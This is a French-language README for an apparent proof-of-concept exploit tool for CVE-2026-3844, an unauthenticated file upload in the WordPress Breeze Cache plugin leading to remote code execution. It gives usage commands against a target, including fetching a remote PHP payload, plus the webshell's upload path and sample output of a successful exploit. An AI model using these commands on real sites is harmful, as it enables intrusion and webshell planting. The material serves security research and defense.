
Preuve de concept en Python pour CVE-2026-3844, un téléversement de fichier arbitraire non authentifié dans le plugin WordPress Breeze Cache, permettant l'exécution de code à distance. Inclut la détection, l'exploitation et la vérification de la webshell.
Ce dépôt contient un script de preuve de concept (PoC) en Python pour démontrer une vulnérabilité de téléversement arbitraire de fichier non authentifié affectant le plugin WordPress Breeze Cache <= 2.4.4.
⚠️ Ce projet est destiné strictement aux tests de sécurité autorisés, à la recherche pédagogique et à la validation défensive uniquement.
La vulnérabilité exploite la fonctionnalité de mise en cache des gravatars de Breeze Cache pour stocker des fichiers contrôlés par l'attaquant dans le répertoire de cache de WordPress.
pycurltermcolorInstaller les dépendances :
pip install pycurl termcolor
| Fichier | Description |
|---|---|
CVE-2026-3844.py | Script d'exploitation PoC principal |
CVE-2026-3844.yaml | Modèle/configuration YAML |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
Le script effectue les étapes suivantes :
Le payload téléversé peut devenir accessible depuis :
/wp-content/cache/breeze-extra/gravatars/
Une exploitation réussie peut dépendre du paramètre Breeze suivant activé :
Héberger les fichiers localement - Gravatars
Si la fonctionnalité est désactivée, les tentatives d'exploitation peuvent échouer.
[+] Cible VULNÉRABLE (Breeze v2.4.4)
[+] Commentaire publié avec succès
[+] Fichier trouvé à : http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] CHAÎNE DE VÉRIFICATION TROUVÉE - EXPLOIT RÉUSSI !
Ce dépôt est fourni pour :
N'utilisez pas ce projet contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce projet.
Les administrateurs de sites web devraient :
/wp-content/cache/ pour détecter les fichiers suspectsCette preuve de concept a été créée pour aider :
à comprendre les risques de sécurité associés aux mécanismes de mise en cache non sécurisés et aux téléversements arbitraires de fichiers.
Projet de recherche en sécurité / pédagogique